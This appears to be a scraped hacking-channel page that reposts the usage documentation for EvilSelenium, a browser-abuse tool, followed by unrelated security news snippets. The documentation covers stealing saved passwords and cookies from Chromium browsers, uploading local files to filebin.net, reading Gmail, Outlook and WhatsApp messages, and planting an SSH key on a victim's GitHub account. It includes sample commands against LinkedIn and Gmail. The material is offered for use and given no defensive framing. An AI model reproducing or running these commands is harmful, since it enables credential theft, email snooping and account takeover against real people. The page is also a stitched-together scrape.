Hacking Articles Tips Tricks Videos Tutorials
467 subscribers
65.6K photos
15 videos
157 files
131K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
/dynamicname2 [login_page] [username_position] [password_position] [username_name] [password_name] - Extract saved credentials from a website, providing the username field name value, password name value and their positions.

COOKIES:
/cookies [website] - Grabs cookies for a given website.

MODULES:
/download [file_url] [seconds] - Downloads a file and specify time to wait for download to finish. File extensions should not be executable.
/exfil [local_file] [seconds] - Uploads a file on filebin.net and outputs the download link.
/gmail [out_path] [num_of_emails] - Fetches emails from mail.google.com if user is authenticated. Max 50 emails.
/outlook [out_path] [num_of_emails] - Fetches emails from Outlook if user is authenticated.
/o365 [out_path] [num_of_emails] - Fetches emails from O365 Outlook if user is authenticated.
/github [key] - Add your SSH key to Github if user is authenticated.
/whatsapp [out_p ath] - Fetches Whatsapp messages if user is authenticated (BETA).
Setup The /install command will download the Chrome Driver and Selenium WebDriver which are the necessary requirements. EvilSelenium will work on Chrome versions 100-90. Tested on Windows 10, Chrome v97 & v90. EvilSelenium.exe /install
Global configuration By default EvilSelenium will try to use Google Chrome's User Data folder to retrieve data, but other Chromium (https://en.wikipedia.org/wiki/Chromium_(web_browser)) based browsers (https://www.kitploit.com/search/label/Browsers) are supported as well.
In order to use different Chrome based browsers you should add the /browserdir following the browser routing in the %localappdata% directory. Here are examples for a few common browsers (should be added to any CLI command): Brave - /browserdir BraveSoftware\Brave-Browser Microsoft Edge - /browserdir Microsoft\Edge Vivaldi - /browserdir Vivaldi Recon Module /enumsavedsites - This will take screenshots of chrome://settings/passwords /screenshot - Screenshot any website. If the user is authenticated to the website then you get authenticated screenshots :). Credentials Module IMPORTANT: The credentials module will DELETE COOKIES in order to steal credentials from autofill. Ideally, you should use the credentials module at the end if you want to export cookies. /autorun - Prebuilt templates for common websites. I'll continue to add more. /dynamicid - Provide the login URL along with the username input field's ID and password field's ID. This is equivalent to document.getElementById(). /dynamicname - If the fields don't have IDs, provide the fields' name values. It will pick the first index of the name values. This is equivalent to document.getElementsByName()[0].value. /dynamicname2 - Provide the fields' name values along with their index position. This is equivalent to document.getElementsByName()[x].value where x is the provided position. Cookies Module /cookies - Dumps cookies from the specified website. Misc Modules These are additional modules I built to demonstrate what sort of actions you can do with Selenium. /download - Download a file & specify time to wait for the download. A non-executable file extension should be appended to the file before downloading to avoid Chrome's Safebrowsing prompt. /exfil - Uploads a file on filebin.net & specify the time to wait for the upload to complete. Once the upload is completed the file's download link is written. /gmail - Fetches emails from mail.google.com if user is authenticated. Max 50 emails. /outlook - Fetches emails from Outlook if user is authenticated. /o365 - Fetches emails from O365 Outlook if user is authenticated. /github - Add your SSH key to Github if user is authenticated. /whatsapp - Fetches Whatsapp messages if user is authenticated (BETA). Sample Commands EvilSelenium.exe /screenshot https://mail.google.com c:\users\mr.d0x\downloads

EvilSelenium.exe /dynamicid https://www.hybrid-analysis.com/login login_email login_password

___________________________
@hacking_Attack
@Hacking_Video
EvilSelenium.exe /dynamicname https://linkedin.com session_key session_password
Demo

___________________________
@hacking_Attack
@Hacking_Video
Dark Reading: Attacks/Breaches
In Appreciation: Mike Murray

Security industry expert who spearheaded healthcare cybersecurity efforts passes away at age 46.
hacking: security in practice
Looking for a wifi adapter that can read in promiscuous mode

Hey everyone, I'm looking to capture packets across my entire network using wireshark. I don't believe my built-in NIC is capable of promiscuous mode. Can anyone recommend a good one to look into? Does it matter which one I get?

submitted by /u/StornZ
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
Dark Reading: Attacks/Breaches
Former DHS Acting IT Chief Convicted in Software, Database Theft Scheme

Former DHS employees targeted confidential, proprietary software and personally identifying information (PII) for hundreds of thousands of federal employees.